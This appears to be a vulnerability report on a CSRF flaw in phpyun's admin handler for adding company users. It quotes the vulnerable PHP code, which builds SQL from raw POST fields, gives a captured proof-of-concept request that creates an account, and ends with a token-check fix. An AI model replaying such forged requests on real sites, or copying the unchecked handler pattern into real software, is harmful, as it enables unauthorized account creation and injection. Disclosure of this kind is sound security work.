phpyun: CSRF to add an enterprise user

Category: Vulnerability Era

Summary

The add-company handler in /admin/model/admin_company.class.php verifies neither a token nor the Referer,

so the action is vulnerable to CSRF. Tested locally.


Vulnerability author:

Xser

Details:

The issue is in /admin/model/admin_company.class.php:

```php
function add_action(){
    $rating_list = $this->obj->DB_select_all("company_rating","`category`=1");
    // No CSRF token or Referer check: any POST carrying "submit" is processed.
    if($_POST['submit'])
    {
        extract($_POST);
        if($username==""||strlen($username)<2||strlen($username)>15)
        {
            $msg = "会员名不能为空或不符合要求!";
        }elseif($password==""||strlen($username)<2||strlen($username)>15){
            // as in the original: the length checks here test $username, not $password
            $msg = "密码不能为空或不符合要求!";
        }elseif($email==""){
            $msg = "email不能为空!";
        }else{
            if($this->config['sy_uc_type']=="uc_center"){
                $this->obj->uc_open();
                $user = uc_get_user($username);
            }else{
                $user = $this->obj->DB_select_once("member","`username`='$username' OR `email`='$email'");
            }
            if(is_array($user))
            {
                $msg = "用户名或邮箱已存在!";
            }else{
                $ip = $this->obj->fun_ip_get();
                $time = time();
                if($this->config['sy_uc_type']=="uc_center")
                {
                    $uid=uc_user_register($_POST['username'],$_POST['password'],$_POST['email']);
                    if($uid<0)
                    {
                        $this->obj->get_admin_msg("index.php?m=com_member&c=add","该邮箱已存在!");
                    }else{
                        list($uid,$username,$email,$password,$salt)=uc_get_user($username);
                        $value = "`username`='$username',`password`='$password',`email`='$email',`usertype`='2',`address`='$address',`status`='$status',`salt`='$salt',`moblie`='$moblie',`reg_date`='$time',`reg_ip`='$ip'";
                    }
                }else{
                    $salt = substr(uniqid(rand()), -6);
                    $pass = md5(md5($password).$salt);
                    $value = "`username`='$username',`password`='$pass',`email`='$email',`usertype`='2',`address`='$address',`status`='$status',`salt`='$salt',`moblie`='$moblie',`reg_date`='$time',`reg_ip`='$ip'";
                }
                // member row is created, then the company / statistics / friend rows
                $nid = $this->obj->DB_insert_once("member",$value);
                $new_info = $this->obj->DB_select_once("member","`username`='$username'");
                $uid = $new_info['uid'];
                if($uid>0)
                {
                    $this->obj->DB_insert_once("company","`uid`='$uid',`name`='$name',`linktel`='$moblie',`linkmail`='$email',`address`='$address'");
                    $rat_arr = @explode("+",$rating_name);
                    $value = "`uid`='$uid',";
                    $value.=$this->rating_info($rat_arr[0]);
                    $this->obj->DB_insert_once("company_statis",$value);
                    $this->obj->DB_insert_once("friend_info","`uid`='$uid',`nickname`='$name',`usertype`='2'");
                    $msg="会员(ID:".$uid.")添加成功";
                }
            }
        }
        if($_POST['type']){
            echo "<script type='text/javascript'>window.location.href='index.php?m=admin_company_job&c=show&uid=".$nid."'</script>";die;
        }else{
            $this->obj->ACT_layer_msg($msg,9,"index.php?m=admin_company",2,1);
        }
    }
    // the rest of the function (form rendering) is not part of the excerpt
}
```

 

Neither a token nor the Referer is verified,

so this leads to CSRF. Tested locally.

The submitted request:

```http
POST /phpyun/phpyun/upload/admin/index.php?m=admin_company&c=add HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 211
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/phpyun/phpyun/upload/admin/index.php?m=admin_company&c=add
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_2a935166b0c9b73fef3c8bae58b95fe4=1411140464; bdshare_firstime=1411271506008; PHPSESSID=a65b349c297eaf372de3b329d7220db4; friend=0; friend_message=0; sysmsg=0; ashell=c0e024d9200b5705bc4804722636378a; remind_num=0

rating_name=3%2B%C3%E2%B7%D1%BB%E1%D4%B1&username=xssss&password=123456&email=10088055%40qq.com&moblie=132863&name=xss&address=xss&status=1&submit=%26%23160%3B%CC%ED+%BC%D3%26%23160%3B&pytoken=ebf2387fb39c&type=
```

 

Building a form with these fields is enough for the CSRF.

As shown in the figure:

[image: phpyun#csrf添加企业用户]

Added successfully:

[image: phpyun#csrf添加企业用户]

The same issue exists in the edit-user-profile function; I won't submit them one by one, so it is just mentioned in passing here.
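The check the handler is missing, as an added example that is not phpyun's own code: a session-bound token compared with hash_equals before extract($_POST) ever runs, plus an Origin/Referer host check as a second layer. The helper names (csrf_issue, csrf_verify, origin_matches, form_token_field) and the session key are assumptions; "pytoken" is the field name seen in the captured request above.

```php
<?php
// Added example, not phpyun's own code. Helper names and the session key
// are assumptions; "pytoken" is the form field name from the captured request.
session_start();

// Issue one random token per session and reuse it for every admin form.
function csrf_issue(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(16));
    }
    return $_SESSION['csrf_token'];
}

// Emit the hidden field the form template must carry.
function form_token_field(): string {
    return '<input type="hidden" name="pytoken" value="'
        . htmlspecialchars(csrf_issue(), ENT_QUOTES) . '">';
}

// Constant-time comparison of the submitted token with the session copy.
function csrf_verify($submitted): bool {
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && is_string($submitted)
        && hash_equals($expected, $submitted);
}

// Defence in depth: the Origin (or, failing that, Referer) host must be ours.
// A state-changing request with neither header is rejected rather than trusted.
function origin_matches(string $ownHost): bool {
    $src = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? '';
    if ($src === '') {
        return false;
    }
    $host = (string) parse_url($src, PHP_URL_HOST);
    return $host !== '' && strcasecmp($host, $ownHost) === 0;
}

// What the top of add_action() should do before touching $_POST.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['submit'])) {
    if (!csrf_verify($_POST['pytoken'] ?? null)
        || !origin_matches($_SERVER['SERVER_NAME'] ?? '')) {
        http_response_code(403);
        exit('invalid request token or origin');
    }
    // ... only now: extract($_POST) and the member/company inserts ...
}
```

The same guard applies unchanged to the edit-profile action mentioned above, since it is the token/Referer check, not the form fields, that is missing.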
